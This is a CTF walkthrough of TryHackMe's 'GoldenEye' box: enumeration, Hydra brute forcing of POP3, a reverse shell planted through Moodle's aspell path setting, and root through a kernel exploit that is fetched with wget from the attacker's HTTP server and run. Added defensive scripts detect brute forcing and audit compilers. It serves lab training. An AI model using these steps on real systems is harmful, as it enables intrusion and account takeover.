CTF Walkthrough | TryHackMe | GoldenEye 👁
Can you root this CMS-based vulnerable machine? This CTF will test your enumeration skills and patience. TryHackMe has this amazing box here: https://tryhackme.com/room/goldeneyess. You can always log in on TryHackMe and go to Rooms → goldeneyess.
Nmap helps me gather information on the open ports. Ports 80 and 25 are open, at least for now. After visiting the open ports, I found a /sev-home/ directory where we can log in! What about the credentials?? I don't have them.
I decided to run nmap against all ports for enumeration and found two new ports, 55006 and 55007. The SSL port was not working, but the POP3 port is. I need to target the POP3 port in this CTF.
Before starting the nmap scan on all ports, I also used gobuster to check whether there was a hidden directory I could use to get into the machine.
I went back to port 80 to enumerate the page source. I have gathered information this way in previous CTFs.
After viewing the page source, I found a JavaScript file included on the page. I opened it in a new tab.
Some start! I found a secret message. More importantly, two users, boris and natalya, and an encoded password. It took me a while, but I could decode the password with an HTML entity decoder. I used an online decoder and got the password "InvicibleHack3r"; I don't know which user it belongs to yet!!
After trying the users found in the previous step, I could log in to the website using the username boris and the password InvicibleHack3r.
I read the message on the webpage; it specifically redirects me to the POP service and says that all the secrets are in it. I used the credentials found in the previous step to log in to the POP service on its non-default port, but it failed.
2. Brute Forcing
I knew where to brute force: the POP3 service. I knew the user would be either boris or natalya; I needed the password to get into the POP3 service.
Hail Hydra!! Let's brute force the password for boris to log in to the POP3 service.
One of the important commands I found was RETR, which retrieves the contents of an email.
Ahaaa!! Another user, admin, found!!
From this account, this is all that we found!! I have another user, natalya; let's check whether I can brute force that account.
I did find the credentials for the account.
Same process: log in to the POP3 service and find out what information is stored in the email.
Another user, Janus, found!
What!! No way. I found the credentials for the
This is not the POP service account, but it looks like an internal training account.
I tried to log in to the /sev-home account to check if they would let me in. No, they didn't.
Now I have to add the domain severnaya-station.com to my /etc/hosts file, since it is mentioned in the email, and this is the process you always have to follow to access an internal website.
Woop!! Woop!! Got it, mate!
User login successful! 😂
Enumerating the user portal, I found there is another user, doak!! I found it in the messages, where he is giving away his username just like that. Time to brute force!
Hydra is such a beautiful tool, never disappointing! I found the credentials for the user doak: it's goat!!
Logging in to the POP3 service with username doak and password goat. After logging in, I found doak's credentials for the internal training website.
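From the defender's side, the repeated POP3 brute forcing above (boris, natalya, then doak) leaves a very visible trail in the mail server's auth log. This added example, not part of the original walkthrough, runs a sliding-window detector over constructed Dovecot-style `pop3-login` lines (the log format, the IPs and the year are assumptions) and also flags a successful login that follows a failure burst from the same source:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log lines in a Dovecot-like format (assumption: the real box's
# POP3 daemon may log differently). IPs and timestamps are made up.
SAMPLE_LOG = """\
Mar 10 12:00:01 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:00:02 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<natalya>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:00:03 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:00:04 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:00:05 mail dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=10.10.14.5, lip=10.10.10.8
Mar 10 12:30:00 mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<doak>, method=PLAIN, rip=10.10.14.9, lip=10.10.10.8
"""

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*pop3-login: Disconnected \(auth failed.*?"
    r"user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)
LOGIN_RE = re.compile(r"pop3-login: Login: user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)")


def parse_ts(ts, year=2024):
    """Syslog timestamps carry no year; assume one so they can be compared."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_pop3_bruteforce(log_text, threshold=4, window_s=60):
    """Alert once when a source IP reaches `threshold` failed POP3 logins within
    `window_s` seconds, and again if that IP then logs in successfully."""
    failures = defaultdict(list)  # rip -> [(timestamp, user)] inside the window
    alerts = []
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if m:
            ts, rip = parse_ts(m["ts"]), m["rip"]
            failures[rip].append((ts, m["user"]))
            # keep only failures that fall inside the sliding window
            failures[rip] = [(t, u) for t, u in failures[rip] if (ts - t).total_seconds() <= window_s]
            if len(failures[rip]) == threshold:
                alerts.append(("bruteforce", rip, sorted({u for _, u in failures[rip]})))
            continue
        m = LOGIN_RE.search(line)
        if m and len(failures[m["rip"]]) >= threshold:
            alerts.append(("success-after-burst", m["rip"], [m["user"]]))
    return alerts


if __name__ == "__main__":
    for alert in detect_pop3_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample the single failure against doak from a second IP stays below the threshold, while the burst against boris/natalya and the login that follows it both raise alerts.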
Once I logged in to the system, I needed to enumerate the training webpage to find something fruitful to move to the next phase of the pentest.
I found private files on the webpage under the My Profile section.
I downloaded the secret text, and it directed me to download a .jpg.
First, I opened the .jpg at severnaya-station.com/dir007key/for-007.jpg.
I downloaded the file to my Kali machine using the wget command.
Additionally, I knew there was something juicy in the .jpg file.
I know the tool stegseek for extracting steganographically hidden data; unfortunately I did not find anything useful. I wanted to find the password, but it didn't work out at all.
Remember exiftool?? Oh yes, I used it to read the metadata of the .jpg image. I found the image description interesting.
Alternatively, you can also inspect the file's magic bytes and raw header to find the information in the metadata.
When you see a trailing '==', remember that it is base64 padding (a base64 string is padded to a multiple of four characters). I decoded it to find the password for the user admin.
I was enumerating the webpage to find more information on the user admin. Since I'm the admin, I can control everything on the webpage: I can create new discussions and new PHP pages, and view server information, system paths and the environment. Most importantly, with admin access I found the Moodle version.
System paths information will be helpful in getting the reverse shell.
Moodle version 2.2.3
Let's check if there are any exploits available on the internet for this version of Moodle. I did try the exploits on Rapid7 using Metasploit, but I did not get a reverse shell.
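Both secrets in this walkthrough were hidden behind a cheap encoding: HTML entities in the page's JavaScript and base64 in the image description. This added example (not from the original post; the sample strings are constructed and are not the box's real credentials) shows how to tell the two apart and decode them, and why a trailing `==` alone is not proof of base64:

```python
import base64
import binascii
import html
import re

# Constructed samples, not the values from the box.
HTML_ENTITY_SAMPLE = "&#83;&#97;&#109;&#112;&#108;&#101;&#80;&#97;&#115;&#115;"  # "SamplePass"
BASE64_SAMPLE = "U2FtcGxlUGFzczEyMw=="  # base64 of "SamplePass123"

_ENTITY_RE = re.compile(r"&(#\d+|#x[0-9a-fA-F]+|[A-Za-z]+);")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(s):
    """Heuristic: base64 alphabet, length a multiple of 4, padding only at the end
    and strict decoding succeeds. 'a==' has the '==' but is not valid base64.
    Short alphanumeric words whose length is a multiple of 4 can still false-positive."""
    s = s.strip()
    if not s or len(s) % 4 != 0 or not _B64_RE.match(s):
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def decode_string(s):
    """Return (encoding_name, decoded_text): HTML entities first (the &#NN; form
    seen in the page source), then base64 (the '==' form from exiftool), else plain."""
    if _ENTITY_RE.search(s):
        return "html-entities", html.unescape(s)
    if looks_like_base64(s):
        raw = base64.b64decode(s, validate=True)
        try:
            return "base64", raw.decode("utf-8")
        except UnicodeDecodeError:
            return "base64", raw.hex()  # binary payload: show as hex instead
    return "plain", s


if __name__ == "__main__":
    for sample in (HTML_ENTITY_SAMPLE, BASE64_SAMPLE, "a==", "admin"):
        print(sample, "->", decode_string(sample))
```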
3. Reverse Shell
Obtaining a reverse shell through a Python one-liner seems to be the appropriate step in this CTF. Python one-liners can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python
I placed the one-liner shell in the system path setting. I'm assuming that Python is installed on the server, which will give me the reverse shell. I tried a PHP one-liner reverse shell, but that did not work for this CTF.
Next: what will cause the reverse shell to run?? I read that when the spell checker (aspell) is used with the text editor, it runs a binary and uses it to perform the spell check.
Python one-liner reverse shell with RHOST set to the Kali/attacking machine and RPORT set to 9000 (some random port).
I found the plugins section and, under it, the text editor plugin. In the TinyMCE HTML editor, change the spell engine to PSpellShell; by default the plugin uses the Google spell checker.
Since I'm the admin, I started a new discussion topic. I went to the intro section and, under it, the news forum. I just had to start a new discussion and call the spell checker to make sure the reverse shell is invoked. Start a netcat listener on port 9000: nc -nlvp 9000
The listener on port 9000 should be running before you click the spell checker button, and now I have a reverse shell. Well, this is stretching competence.
Now I wanted a TTY shell, so I googled it.
Note: in my case /bin/sh wasn't working. I changed it to /bin/bash to spawn a TTY shell.
I went to the /etc directory to read the passwd file. At the moment, I'm the www-data user.
4. Privilege Escalation
I needed to switch to the root user. One of the key things is to check the Linux kernel version, which I did with uname -a. I found the exploit to become root.
After reading the exploit, I made sure the prerequisites were fulfilled. I checked for gcc, but the vulnerable machine doesn't have it. Alternatively, I found cc, which was available on the vulnerable machine.
I downloaded the exploit from Exploit-DB and saved it on my Kali machine. I changed the compiler call on line 110 from gcc to cc.
I compiled it using cc and named the output file rshell. It gave me some warnings, but the compilation was successful.
Run python -m SimpleHTTPServer 80 in the directory where you have the rshell file so that you can use wget http://<IP of kali machine>:80/rshell to fetch the compiled exploit.
On the vulnerable machine I went to the /tmp directory, used the wget command and got the malicious file into the temp directory of the vulnerable machine.
I made the exploit executable using chmod 755 rshell.
I ran the file; it used the cc compiler and finally I got the root shell. Woooop!! Woooop!!
I went to the root folder and read the contents of the .flag.txt file.
Found the flag and its contents, completing the CTF.
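The root step only worked because the box, although it lacked gcc, still shipped cc, so the kernel exploit could be compiled on the target itself. This added hardening check (not from the walkthrough) lists compilers and interpreters reachable from a set of directories so a defender can see what a foothold could reuse; the directory list and the tool names are assumptions, and the demo runs against a constructed tree rather than the real PATH:

```sh
#!/bin/sh
# Added audit helper: which build tools would a low-privileged shell find?
# Real use: find_build_tools $(echo "$PATH" | tr ':' ' ')
BUILD_TOOLS="gcc cc c99 c89 tcc clang g++ c++ as ld make cmake python python3 perl"

# find_build_tools DIR... -> prints "name path" for every tool found
find_build_tools() {
    for dir in "$@"; do
        for tool in $BUILD_TOOLS; do
            if [ -x "$dir/$tool" ] && [ ! -d "$dir/$tool" ]; then
                printf '%s %s\n' "$tool" "$dir/$tool"
            fi
        done
    done
}

# count_build_tools DIR... -> number of tools found (the audit result)
count_build_tools() {
    find_build_tools "$@" | wc -l | tr -d ' '
}

# Constructed demo tree: a fake bin directory with only cc and make, mirroring
# the "no gcc, but cc is there" situation on this box.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
for f in cc make; do
    : > "$demo_dir/$f"
    chmod 755 "$demo_dir/$f"
done

echo "Build tools found in $demo_dir:"
find_build_tools "$demo_dir"
echo "Total: $(count_build_tools "$demo_dir")"
```

A production host that needs none of these for its workload is a candidate for removing them, which turns "download source, compile locally" into an extra hurdle for an attacker.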
Until the next one, peace ✌🏽